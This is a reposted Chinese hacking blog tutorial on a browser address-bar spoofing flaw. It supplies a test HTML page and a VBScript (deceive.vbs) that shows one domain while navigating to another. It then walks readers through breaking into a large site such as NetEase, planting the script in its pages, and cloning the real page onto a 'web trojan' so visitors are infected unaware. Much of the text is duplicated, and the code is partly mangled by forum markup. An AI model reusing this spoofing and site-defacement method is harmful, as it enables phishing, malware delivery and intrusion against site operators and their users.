网页
木马种植方案一直都存在很大的问题,当然
欺骗
需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新
浏览器
漏洞实现域名的欺骗.....
前言
域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。
多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的:
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意 页面 ,而用户浏览器的 地址 栏里所显示的将是虚假的url:
url的构造格式为:
说明:
url_1为用户所看到的地址,地址中不可以带"/"
special_char为一个特殊的字符,即ascii码为1的字符
url_2为恶意页面地址
利用过程
首先请看这个测试页面:
<html>
<head>
<title>域名欺骗技术实例</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
你可以看看这两个链接有什么区别:
<br>
<h1>链接1:
<script language="vbscript" src="deceive.vbs">
</script></h1>
<h1>链接2:
<a href="_blank ?> [url]www.163.com[/url] " target="_blank">
[url]http://www.163.com/[/url] "; target="_blank" [url]http://ww[/url] ... ";>
[url]www.163.com[/url] </a>
</h1>
</body>
</html>
这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:
''''''''''''''''''deceive.vbs''''''''''''''''''''
'(以下请根据实际情况自行修改:)
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover=" :window.status='_blank ?>
http://";&url1&dn&"'"""
mouseout=" :window.status=''"""
click=" :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&">
<font color=""#0000ff""><u>"&text&"</u>
</font></span>"
document.write tag
'说明:
'url1是用来欺骗用户的地址.
'url2是实际访问的地址,可以是网页 木马 、恶意网页等.
'text是链接的文字.
'注意:(以上欺骗地址及实际地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank> [url]http://www.163.com/[/url] ",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。
我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就......
不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站,比如网易(哇~~~~~~这时候一只菜鸟推着一车砖头,看着我......)。这时候就可以把它的页面给改了。
比如有一个文字链接,我们就可以把代码中的"<a href="xxxxx.htm">xxxxxx</a>"改为我们自己的代码:"<script language="vbscript" src="deceive.vbs"></script>"。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下。
这样还不行,我们还要把自己的木马网页的界面修改一下。也就是把原来链接到的页面加入到我们自己的木马网页,并且我们的木马网页里的所有链接等内容要和原来的页面一样,否则就会引起用户的怀疑。现在,我们把google网站的首页源代码全部复制下来,添加到我们的网页木马。把复制下来的代码中的图片或者是链接的文件都修改完整,比如logo.gif改为_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否则网页就和原来的不一样了(图片显示为红色的×,链接也失效),因为用户打开的是你的站点,而你的站点中并没有logo.gif。都修改好后就可以保存文件了。上传到你的网页空间里。
至此,我们的工作已经完成。喝一杯咖啡,休息一会......
前言
域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。
多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的:
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意 页面 ,而用户浏览器的 地址 栏里所显示的将是虚假的url:
url的构造格式为:
说明:
url_1为用户所看到的地址,地址中不可以带"/"
special_char为一个特殊的字符,即ascii码为1的字符
url_2为恶意页面地址
利用过程
首先请看这个测试页面:
<html>
<head>
<title>域名欺骗技术实例</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
你可以看看这两个链接有什么区别:
<br>
<h1>链接1:
<script language="vbscript" src="deceive.vbs">
</script></h1>
<h1>链接2:
<a href="_blank ?> [url]www.163.com[/url] " target="_blank">
[url]http://www.163.com/[/url] "; target="_blank" [url]http://ww[/url] ... ";>
[url]www.163.com[/url] </a>
</h1>
</body>
</html>
这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:
''''''''''''''''''deceive.vbs''''''''''''''''''''
'(以下请根据实际情况自行修改:)
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover=" :window.status='_blank ?>
http://";&url1&dn&"'"""
mouseout=" :window.status=''"""
click=" :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&">
<font color=""#0000ff""><u>"&text&"</u>
</font></span>"
document.write tag
'说明:
'url1是用来欺骗用户的地址.
'url2是实际访问的地址,可以是网页 木马 、恶意网页等.
'text是链接的文字.
'注意:(以上欺骗地址及实际地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank> [url]http://www.163.com/[/url] ",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。
我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就......
不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站,比如网易(哇~~~~~~这时候一只菜鸟推着一车砖头,看着我......)。这时候就可以把它的页面给改了。
比如有一个文字链接,我们就可以把代码中的"<a href="xxxxx.htm">xxxxxx</a>"改为我们自己的代码:"<script language="vbscript" src="deceive.vbs"></script>"。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下。
这样还不行,我们还要把自己的木马网页的界面修改一下。也就是把原来链接到的页面加入到我们自己的木马网页,并且我们的木马网页里的所有链接等内容要和原来的页面一样,否则就会引起用户的怀疑。现在,我们把google网站的首页源代码全部复制下来,添加到我们的网页木马。把复制下来的代码中的图片或者是链接的文件都修改完整,比如logo.gif改为_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否则网页就和原来的不一样了(图片显示为红色的×,链接也失效),因为用户打开的是你的站点,而你的站点中并没有logo.gif。都修改好后就可以保存文件了。上传到你的网页空间里。
至此,我们的工作已经完成。喝一杯咖啡,休息一会......
当我们进入这个网站后,点击我们修改过的连接,你会发现和原来的页面几乎就一模一样(当然,也有些细微的区别,不过一般很难觉察)。就当人家在浏览这个网页的时候,他已经在不知不觉中中了木马,而你也开心地笑呢!~
本文转自starger51CTO博客,原文链接: http://blog.51cto.com/starger/17141,如需转载请自行联系原作者